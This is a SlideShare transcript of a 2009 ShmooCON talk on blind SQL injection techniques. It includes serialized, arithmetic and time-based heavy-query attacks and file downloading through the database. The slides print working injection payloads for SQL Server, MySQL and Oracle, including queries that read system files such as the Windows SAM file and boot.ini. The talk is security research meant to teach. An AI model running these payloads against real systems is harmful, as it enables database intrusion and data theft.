Your SlideShare is downloading. ×
0
ShmooCON 2009 : Re-playing with (Blind) SQL Injection
ShmooCON 2009 : Re-playing with (Blind) SQL Injection
ShmooCON 2009 : Re-playing with (Blind) SQL Injection
ShmooCON 2009 : Re-playing with (Blind) SQL Injection
ShmooCON 2009 : Re-playing with (Blind) SQL Injection
ShmooCON 2009 : Re-playing with (Blind) SQL Injection
ShmooCON 2009 : Re-playing with (Blind) SQL Injection
ShmooCON 2009 : Re-playing with (Blind) SQL Injection
ShmooCON 2009 : Re-playing with (Blind) SQL Injection
ShmooCON 2009 : Re-playing with (Blind) SQL Injection
ShmooCON 2009 : Re-playing with (Blind) SQL Injection
ShmooCON 2009 : Re-playing with (Blind) SQL Injection
ShmooCON 2009 : Re-playing with (Blind) SQL Injection
ShmooCON 2009 : Re-playing with (Blind) SQL Injection
ShmooCON 2009 : Re-playing with (Blind) SQL Injection
ShmooCON 2009 : Re-playing with (Blind) SQL Injection
ShmooCON 2009 : Re-playing with (Blind) SQL Injection
ShmooCON 2009 : Re-playing with (Blind) SQL Injection
ShmooCON 2009 : Re-playing with (Blind) SQL Injection
ShmooCON 2009 : Re-playing with (Blind) SQL Injection
ShmooCON 2009 : Re-playing with (Blind) SQL Injection
ShmooCON 2009 : Re-playing with (Blind) SQL Injection
ShmooCON 2009 : Re-playing with (Blind) SQL Injection
ShmooCON 2009 : Re-playing with (Blind) SQL Injection
ShmooCON 2009 : Re-playing with (Blind) SQL Injection
ShmooCON 2009 : Re-playing with (Blind) SQL Injection
ShmooCON 2009 : Re-playing with (Blind) SQL Injection
ShmooCON 2009 : Re-playing with (Blind) SQL Injection
ShmooCON 2009 : Re-playing with (Blind) SQL Injection
ShmooCON 2009 : Re-playing with (Blind) SQL Injection
ShmooCON 2009 : Re-playing with (Blind) SQL Injection
ShmooCON 2009 : Re-playing with (Blind) SQL Injection
ShmooCON 2009 : Re-playing with (Blind) SQL Injection
ShmooCON 2009 : Re-playing with (Blind) SQL Injection
ShmooCON 2009 : Re-playing with (Blind) SQL Injection
ShmooCON 2009 : Re-playing with (Blind) SQL Injection
ShmooCON 2009 : Re-playing with (Blind) SQL Injection
ShmooCON 2009 : Re-playing with (Blind) SQL Injection
ShmooCON 2009 : Re-playing with (Blind) SQL Injection
ShmooCON 2009 : Re-playing with (Blind) SQL Injection
ShmooCON 2009 : Re-playing with (Blind) SQL Injection
ShmooCON 2009 : Re-playing with (Blind) SQL Injection
ShmooCON 2009 : Re-playing with (Blind) SQL Injection
ShmooCON 2009 : Re-playing with (Blind) SQL Injection
ShmooCON 2009 : Re-playing with (Blind) SQL Injection
ShmooCON 2009 : Re-playing with (Blind) SQL Injection
ShmooCON 2009 : Re-playing with (Blind) SQL Injection
ShmooCON 2009 : Re-playing with (Blind) SQL Injection
ShmooCON 2009 : Re-playing with (Blind) SQL Injection
ShmooCON 2009 : Re-playing with (Blind) SQL Injection
ShmooCON 2009 : Re-playing with (Blind) SQL Injection
ShmooCON 2009 : Re-playing with (Blind) SQL Injection
ShmooCON 2009 : Re-playing with (Blind) SQL Injection
ShmooCON 2009 : Re-playing with (Blind) SQL Injection
Upcoming SlideShare
Loading in...5
×

Thanks for flagging this SlideShare!

Oops! An error has occurred.

×
Saving this for later? Get the SlideShare app to save on your phone or tablet. Read anywhere, anytime – even offline.
Text the download link to your phone
Standard text messaging rates apply

ShmooCON 2009 : Re-playing with (Blind) SQL Injection

780

Published on

Talk delivered by Chema Alonso & Jose Palazon "Palako" in ShmooCON 2009 at Washington about SQL Injection, Blind SQL Injection, Time-Based Blind SQL Injection, RFD (Remote File Downloading) and …

Talk delivered by Chema Alonso & Jose Palazon "Palako" in ShmooCON 2009 at Washington about SQL Injection, Blind SQL Injection, Time-Based Blind SQL Injection, RFD (Remote File Downloading) and Serialized SQL Injection. http://www.slideshare.net/chemai64/timebased-blind-sql-injection-using-heavy-queries-34887073

Published in: Technology
0 Comments
1 Like
Statistics
Notes
  • Be the first to comment

No Downloads
Views
Total Views
780
On Slideshare
0
From Embeds
0
Number of Embeds
4
Actions
Shares
0
Downloads
17
Comments
0
Likes
1
Embeds 0
No embeds

Report content
Flagged as inappropriate Flag as inappropriate
Flag as inappropriate

Select your reason for flagging this presentation as inappropriate.

Cancel
No notes for slide

Transcript

  • 1. (Re) Playing with (Blind) SQL Injection José Palazón “Palako” Mobile Security at Yahoo! Chema Alonso Informatica64 Microsoft MVP Enterprise Security
  • 2. Spain (…not only bulls…)
  • 3. SQL Injection attacks http://www.phrack.org/issues.html?id=8&issue=54 A long time ago, in a galaxy far, far away…
  • 4. Agenda • Serialized SQL Injection – Demo: XML Extractor • Arithmetic SQL Injection – Divide by Zero – Sums and subtractions – Type oveflow – Demo • Remote File Downloading using Blind SQL Injection – SQL Sever – MySQL – Oracle – Demo: RFD Tool • Time-Based Blind SQL Injection using heavy queries – Demo: Marathon Tool
  • 5. Serialized SQL Injection
  • 6. Serialized SQL Injection • Goal: To Merge complex resultsets in a single showable field • XML serialization functions allow to convert a resultset into a one XML string. • It´s possible to download big amount of data with single and simple injections.
  • 7. SQL Server • FOR XML: Retrieves data as a single string representing an XML tree. • RAW: Mandatory option. Shows the information converting each row of the result set in an XML element in the form <row />. • BINARY BASE64: The query will fail if we find any BINARY data type column (containing images, or passwords) if this option is not explicitly specified. – union select '1','2','3',(select * from sysusers for xml raw, binary base64) • XMLSCHEMA: obtains the whole table structure, including the data types, column names and other constraints. – Described by Dani Kachakil
  • 8. MySQL • No default XML support, requires a server side extension • GROUP_CONCAT (v 4.1+)
  • 9. Oracle • xmlforest, xmlelement,… • No * support
  • 10. Demo: Serialized SQL Injection
  • 11. Arithmetic Blind SQL Injection
  • 12. Blind Attacks • Attacker injects code but can´t access directly to the data. • However this injection changes the behavior of the web application. • Then the attacker looks for differences between true code injections (1=1) and false code injections (1=2) in the response pages to extract data. – Blind SQL Injection – Biind Xpath Injection – Blind LDAP Injection
  • 13. Blind SQL Injection Attacks • Attacker injects: – “True where clauses” – “False where clauses“ – Ex: • Program.php?id=1 and 1=1 • Program.php?id=1 and 1=2 • Program doesn’t return any visible data from database or data in error messages. • The attacker can´t see any data extracted from the database.
  • 14. Blind SQL Injection Attacks • Attacker analyzes the response pages looking for differences between “True-Answer Page” and “False-Answer Page”: – Different hashes – Different html structure – Different patterns (keywords) – Different linear ASCII sums – “Different behavior” • By example: Response Time
  • 15. Blind SQL Injection Attacks • If any difference exists, then: – Attacker can extract all information from database – How? Using “booleanization” • MySQL: – Program.php?id=1 and 100>(ASCII(Substring(user(),1,1))) » “True-Answer Page” or “False-Answer Page”? • MSSQL: – Program.php?id=1 and 100>(Select top 1 ASCII(Substring(name,1,1))) from sysusers) • Oracle: – Program.php?id=1 and 100>(Select ASCII(Substr(username,1,1))) from all_users where rownum<=1)
  • 16. Arithmetic Blind SQL Injection • The query force the parameter to be numeric – SELECT field FROM table WHERE id=abs(param) • Boolean logic is created with math operations – Divide by zero – Sums and subtractions – Type overflows
  • 17. Arithmetic Blind SQL Injection • Divide by zero (David Litchfield) – Id=A+(1/(ASCII(B)-C)) •A-> Param value originally used in the query. •B -> Value we are searching for, e.g.: Substring(passwd,1,1) •C-> Counter [0..255] – When ASCII(B)=C, the DB will generate a divide by zero exception.
  • 18. Arithmetic Blind SQL Injection • Sums and subtractions – Id=A+ASCII(B)-C •A-> Param value originally used in the query. •B -> Value we are searching for, e.g.: Substring(passwd,1,1) •C-> Counter [0..255] – When ASCII(B)=C, then the response page of id=A+ASCII(B)-C will be the same as id=A
  • 19. Arithmetic Blind SQL Injection • Value type overflow – Id=A+((C/ASCII(B))*(K)) •A-> Param value originally used in the query. •B -> Value we are searching for, e.g.: Substring(passwd,1,1) •C-> Counter [0..255] •K-> Value that overflows the type defined for A –(e.g. if A is integer, then K=2^32) – When C/ASCII(B)==1, K*1 overflows the data type
  • 20. Demo: • Divide by zero • Sums and subtractions • Integer overflow
  • 21. Remote File Downloading using Blind SQL Injection techniques
  • 22. Accessing Files • Two ways: – Load the file in a temp table • and i>(select top 1 ASCII(Substring(column)(file,pos,1)) from temp_table ?? – Load the file in the query • With every query the file is loaded in memory • I am very sorry, engine  • and i>ASCII(Substring(load_file(file,pos,1))??
  • 23. SQL Server 2K - External Data Sources • Only for known filetypes: – Access trough Drivers: Txt, csv, xls, mdb, log – And 200>ASCII (SUBSTRING(SELECT * FROM OPENROWSET('MSDASQL', 'Driver = {Microsoft Text Driver (*.txt; *.csv)};DefaultDir=C:;','select top 1 * from c:dirtarget.txt’),1,1)) • Privileges – HKEY_LOCAL_MACHINESOFTWAREMicrosoftMSSQLServerProvidersDisall owAdhocAccess=0 – By default this key doesn´t exist so only users with Server Admin Role can use these functions. • NTFS permissions
  • 24. SQL Server 2K – Bulk option • Access to any file – ; Create Table TempTable as (row varchar(8000)) -- – ; Bulk Insert TempTable From 'c:file.ext' With (FIELDTERMINATOR = 'n', ROWTERMINATOR = 'n‘) -- – ; alter table TempTable add num int IDENTITY(1,1) NOT NULL – – and (select COUNT(row) from TempTable) – and (select top 1 len(row) from TempTable where num = rownum) – and (select top 1 ASCII(SUBSTRING(row,1,1)) from TempTable where num = 1) – ; Drop Table TempTable-- • Privileges needed – Server Role: Bulkadmin – Database Role: db_owner o db_ddladmin • NTFS permissions
  • 25. SQL Server 2k5 – 2k8 • OPENDATASOURCE and OPENROWSET supported • Bulk options improved – AND 256 > ASCII(SUBSTRING ((SELECT * FROM OPENROWSET(BULK 'c:windowsrepairsam', SINGLE_BLOB) As Data), 1, 1))— • Permisions • Bulkadmin Server Role • External Data Sources enabled • Sp_configure • Surface configuration Tool for features
  • 26. MySQL • LoadFile – SELECT LOAD_FILE(0x633A5C626F6F742E696E69) • SQLbfTools: MySQLget command (illo and dab) • http://www.reversing.org/node/view/11 • Load Data infile – ; Create table C8DFC643 (datos varchar(4000)) – ; Load data infile 'c:boot.ini' into table C8DFC643 – ; alter table C8DFC643 add column num integer auto_increment unique key – and (select count(num) from C8DFC643) – and (select length(datos) from C8DFC643 where num = 1) – and (select ASCII(substring(datos,5,1)) from C8DFC643 where num = 1) – ; Drop table C8DFC643
  • 27. Oracle – Plain Text files • External Tables – ; execute immediate 'Create Directory A4A9308C As ''c:'' '; end; -- – ; execute immediate 'Create table A737D141 ( datos varchar2(4000) ) organization external (TYPE ORACLE_LOADER default directory A4A9308C access parameters ( records delimited by newline ) location (''boot.ini''))'; end;-- – Only Plain Text files
  • 28. Oracle – DBMS_LOB ; execute immediate ‘ DECLARE l_bfile BFILE; l_blob BLOB; BEGIN INSERT INTO A737D141 (datos) VALUES (EMPTY_BLOB()) RETURN datos INTO l_blob; l_bfile := BFILENAME(''A4A9308C'', ''Picture.bmp''); DBMS_LOB.fileopen(l_bfile, Dbms_Lob.File_Readonly); DBMS_LOB.loadfromfile(l_blob,l_bfile,DBMS_LOB.getlength(l_bfile)); DBMS_LOB.fileclose(l_bfile); COMMIT; EXCEPTION WHEN OTHERS THEN ROLLBACK; END;‘ ; end; --
  • 29. Demo RFD
  • 30. Time-based Blind SQL Injection using heavy queries
  • 31. Time-Based Blind SQL Injection • In scenarios with no differences between “True- Answer Page” and “False-Answer Page”, time delays can be used. • Injection forces a delay in the response page when the condition injected is True. - Delay functions: • SQL Server: waitfor • Oracle: dbms_lock.sleep • MySQL: sleep or Benchmark Function • Postgres: pg_sleep – Ex: • ; if (exists(select * from users)) waitfor delay '0:0:5’
  • 32. Exploit for Solar Empire Web Game
  • 33. Deep Blind SQL Injection • Time delay depends on the wanted value. • E.g. “a”->10s. delay, “b”->11s. Delay, … • http://labs.portcullis.co.uk/application/deep-blind-
  • 34. Time-Based Blind SQL Injection • What about databases engines without delay functions, i.e., MS Access, Oracle connection without PL/SQL support, DB2, etc…? • Can we still perform an exploitation of Time- Based Blind SQL Injection Attacks?
  • 35. Yes, we can!
  • 36. “Where-Clause” execution order Select “whatever “ From whatever Where condition1 and condition2 - Condition1 lasts 10 seconds - Condition2 lasts 100 seconds Which condition should be executed first?
  • 37. The heavy condition first Condition2 (100 sec) Condition1 (10 sec) Condition2 & condition1 Response Time TRUE FALSE FALSE 110 sec TRUE TRUE TRUE 110 sec FALSE Not evaluated FALSE 100 sec
  • 38. The light condition first Condition1 (10 sec) Condition2 (100 sec) Condition1 & condition2 Response Time TRUE FALSE FALSE 110 sec TRUE TRUE TRUE 110 sec FALSE Not evaluated FALSE 10 sec
  • 39. Time-Based Blind SQL Injection using Heavy Queries • Attacker can perform an exploitation delaying the “True-answer page” using a heavy query. • It depends on how the database engine evaluates the where clauses in the query. • There are two types of database engines: – Databases without optimization process – Databases with optimization process
  • 40. Time-Based Blind SQL Injection using Heavy Queries • Attacker could inject a heavy Cross-Join condition for delaying the response page in True-Injections. • The Cross-join injection must be heavier than the other condition. • Attacker only have to know or to guess the name of a table with select permission in the database. • Example in MSSQL: – Program.php?id=1 and (SELECT count(*) FROM sysusers AS sys1, sysusers as sys2, sysusers as sys3, sysusers AS sys4, sysusers AS sys5, sysusers AS sys6, sysusers AS sys7, sysusers AS sys8)>1 and 300>(select top 1 ascii(substring(name,1,1)) from sysusers)
  • 41. “Default” tables to construct a heavy query – Microsoft SQL Server • sysusers – Oracle • all_users – MySQL (versión 5) • information_schema.columns – Microsoft Access • MSysAccessObjects (97 & 2000 versions) • MSysAccessStorage (2003 & 2007) 41
  • 42. “Default” tables to construct a heavy query • …or whatever you can guess – Clients – Customers – News – Logins – Users – Providers – ….Use your imagination…
  • 43. Ex 1: MS SQL Server Query lasts 14 seconds -> True-Answer
  • 44. Ex 1: MS SQL Server • Query lasts 1 second -> False-Answer
  • 45. Ex 2: Oracle Query Lasts 22 seconds –> True-Answer
  • 46. Ex 2: Oracle Query Lasts 1 second –> False-Answer
  • 47. Ex 3: Access 2000 Query Lasts 6 seconds –> True-Answer
  • 48. Ex 3: Access 2000 Query Lasts 1 second –> False-Answer
  • 49. Ex 4: Access 2007 Query Lasts 39 seconds –> True-Answer
  • 50. Ex 4: Access 2007 Query Lasts 1 second –> False-Answer
  • 51. Marathon Tool • Automates Time-Based Blind SQL Injection Attacks using Heavy Queries in SQL Server, MySQL, MS Access and Oracle Databases. • Schema Extraction from known databases • Extract data using heavy queries not matter in which database engine (without schema) • Developed in .NET • Source code available
  • 52. Demo: Marathon Tool
  • 53. Prevention: Don´t forget Bobby Tables! SANITIZE YOUR QUERIES!
  • 54. ¿Preguntas? • Speakers: – Chema Alonso (chema@informatica64.com) – Palako (palako@lateatral.com) • Autores – Chema Alonso (chema@informatica64.com) – Alejandro Martín (amartin@informatica64.com) – Antonio Guzmán (aguzman@urjc.es) – Daniel Kachakil (dani@kachakil.org) – José Palazón “Palako” (palako@lateatral.com) – Marta Beltran (mberltran@urjc.es)

×